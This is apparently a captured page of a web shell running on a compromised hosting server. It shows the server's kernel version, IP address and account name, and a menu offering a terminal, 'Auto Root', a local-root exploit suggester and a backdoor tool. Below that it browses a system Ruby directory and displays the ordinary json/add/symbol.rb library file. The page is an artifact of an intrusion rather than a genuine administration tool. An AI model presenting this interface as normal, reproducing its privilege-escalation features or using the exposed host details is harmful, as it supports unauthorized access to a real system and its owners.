Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
lib64 /
ruby /
2.6.0 /
json /
add /
Delete
Unzip
Name
Size
Permission
Date
Action
bigdecimal.rb
598
B
-rw-r--r--
2023-07-26 20:33
complex.rb
749
B
-rw-r--r--
2023-07-26 20:33
core.rb
348
B
-rw-r--r--
2023-07-26 20:33
date.rb
881
B
-rw-r--r--
2023-07-26 20:33
date_time.rb
1.3
KB
-rw-r--r--
2023-07-26 20:33
exception.rb
799
B
-rw-r--r--
2023-07-26 20:33
ostruct.rb
797
B
-rw-r--r--
2023-07-26 20:33
range.rb
786
B
-rw-r--r--
2023-07-26 20:33
rational.rb
780
B
-rw-r--r--
2023-07-26 20:33
regexp.rb
760
B
-rw-r--r--
2023-07-26 20:33
struct.rb
786
B
-rw-r--r--
2023-07-26 20:33
symbol.rb
614
B
-rw-r--r--
2023-07-26 20:33
time.rb
1016
B
-rw-r--r--
2023-07-26 20:33
Save
Rename
#frozen_string_literal: false unless defined?(::JSON::JSON_LOADED) and ::JSON::JSON_LOADED require 'json' end class Symbol # Returns a hash, that will be turned into a JSON object and represent this # object. def as_json(*) { JSON.create_id => self.class.name, 's' => to_s, } end # Stores class name (Symbol) with String representation of Symbol as a JSON string. def to_json(*a) as_json.to_json(*a) end # Deserializes JSON string by converting the <tt>string</tt> value stored in the object to a Symbol def self.json_create(o) o['s'].to_sym end end